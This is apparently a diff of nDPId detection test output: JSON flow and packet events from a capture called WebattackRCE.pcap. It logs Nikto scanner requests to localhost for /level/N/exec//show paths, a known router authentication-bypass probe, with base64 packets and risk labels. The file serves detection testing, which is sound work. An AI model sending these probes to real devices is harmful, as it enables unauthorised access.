+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}}
